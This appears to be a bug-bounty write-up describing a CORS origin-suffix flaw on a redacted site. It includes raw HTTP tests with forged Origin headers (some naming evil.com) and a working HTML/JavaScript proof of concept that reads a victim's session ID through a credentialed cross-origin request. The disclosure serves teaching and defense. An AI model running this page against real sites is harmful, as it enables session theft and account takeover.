Pre-domain wildcard CORS Exploitation

Arbaz Hussain
Aug 26, 2017 · 3 min read

Image for post
Image for post

Severity: High

Complexity: Medium

Weakness : Trusting Pre-domain Wildcard as Origin


  • Some websites make classic URL parsing mistakes when attempting to verify whether an origin should be trusted.

For example, a site which I’ll call advisor.com trusts all origins that ended in advisor.com, including definitelynotadvisor.com

  • Following are the Test Cases tried for finding predomain wildcard weakness :

Calling it as REDACTED.COM since it is private program on Hackerone.


* TEST 1 :GET /account HTTP/1.1
Host: connect.redacted.com
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: redacted.com
Accept-Language: en-US,en;q=0.8
Cookie:
Origin: https://redacted.com

* Response :
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Accept-Encoding, Accept-Language, Authorization, X-Context, X-Session-ID
Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS
Access-Control-Allow-Origin: https://redacted.com
Access-Control-Max-Age: 3600

Test 2 :GET /account HTTP/1.1
Host: connect.redacted.com
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: redacted.com
Accept-Language: en-US,en;q=0.8
Cookie:
Origin: https://evil.com
* Response :HTTP/1.1 302 Found
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Aug 2017 20:00:08 GMT
Location: https://connect.redacted.com/auth

Test 3:GET /account HTTP/1.1
Host: connect.redacted.com
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: redacted.com
Accept-Language: en-US,en;q=0.8
Cookie:
Origin: https://redacted.com.evil.com
* Response :HTTP/1.1 302 Found
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Aug 2017 20:00:08 GMT
Location: https://connect.redacted.com/auth

Test 4:GET /account HTTP/1.1
Host: connect.redacted.com
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: redacted.com
Accept-Language: en-US,en;q=0.8
Cookie:
Origin: https://connect.redacted.com.evil.com
* Response :HTTP/1.1 302 Found
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Aug 2017 20:00:08 GMT
Location: https://connect.redacted.com/auth

Test 5:GET /account HTTP/1.1
Host: connect.redacted.com
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: redacted.com
Accept-Language: en-US,en;q=0.8
Cookie:
Origin: https://evilredacted.com
* Response :Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Accept-Encoding, Accept-Language, Authorization, X-Context, X-Session-ID
Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS
Access-Control-Allow-Origin: https://evilredacted.com
Access-Control-Max-Age: 3600
  • From Test 5 it is clear that application is Just Verifying Origin By Checking If it Ends with redacted.com
  • (ACAH) Along with Different Methods are Also Enabled , This Means Attacker Can Make different Request’s Behalf of the Victim .
  • To Successfully Exploit this We Need *redacted.com domain
  • So , I Went to Bought it kiraakredacted.com to exploit it

  • Exploitation :

Now it’s time to find Good Exploitation Endpoint to demonstrate & Increase the Impact.There was nothing much on connect.redacted.com to exploit just like static site asking to install their browser extension .

But one thing kept my MINDSET to find some exploitation path is that to install that extension you need to be logged in . I doubted they were storing some information somewhere . So I Started bruteforcing , Reading docs for API Endpoints . And came across which contain’s the user detail’s along with SESSIONID in json response .

<html>
<body>
<button type='button' onclick='cors()'>xxx</button>
<p id='demo'></p>
<p id='session'></p>
<script>
function cors() {
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
document.getElementById("demo").innerHTML = this.responseText;
parsed = JSON.stringify(this.responseText);
var arr = [];
for(var x in parsed){
arr.push(parsed[x]);
}
console.log(arr)
document.getElementById(‘session’).innerHTML = arr[13];
}
};
xhttp.open("GET", "https://connect.redacted.com/v1/user", true);
xhttp.withCredentials = true;
xhttp.send();
}
</script>
</body>
</html>
Image for post
Image for post
Response
  • Able to Takeover user account’s remotely.

InfoSec Write-ups

A collection of write-ups from the best hackers in the…

Arbaz Hussain

Written by

~Kiraak-Boy~

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew

Arbaz Hussain

Written by

~Kiraak-Boy~

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store